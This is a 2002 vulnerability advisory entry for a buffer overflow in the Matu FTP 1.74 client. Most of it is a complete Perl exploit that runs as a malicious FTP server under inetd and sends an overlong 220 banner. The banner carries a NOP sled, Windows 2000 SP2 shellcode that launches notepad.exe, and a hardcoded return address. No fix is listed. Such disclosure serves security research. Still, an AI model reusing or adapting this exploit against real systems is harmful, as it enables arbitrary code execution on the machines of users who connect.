26th Sep 2002 [SBWID-5303]
COMMAND
	Matu FTP remote root exploit
SYSTEMS AFFECTED
	Matu FTP Version 1.74
PROBLEM
	Kanatoko [http://www.jumperz.net/] found :
	The buffer overflow occurs when a long string like
	
	220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>
	
	is received by Matu FTP  in  the  beginning  of  an  FTP  session.  This
	vulnerability allows malicious FTP server to execute an  arbitrary  code
	on client hosts.
	This exploit code is invoked as an FTP server through inetd.
	
	#!/usr/local/bin/perl
	#------------------------------------------------------
	# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
	# ( run under inetd )
	# written by Kanatoko <[email protected]>
	# http://www.jumperz.net/
	#------------------------------------------------------
	$|=1;
	        #egg written by UNYUN (http://www.shadowpenguin.org/)
	$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
	$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
	$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
	$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
	$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
	$egg .= "notepad.exe";
	        #egg_address = 0x0012F43C
	$buf = "\x90" x 217;
	$buf .= $egg;
	$buf .= "A" x 2;
	$buf .= "\x3C\xF4\x12\x00";
	$buf .= "B" x 80;
	print "220 $buf\r\n";
	
SOLUTION
	None yet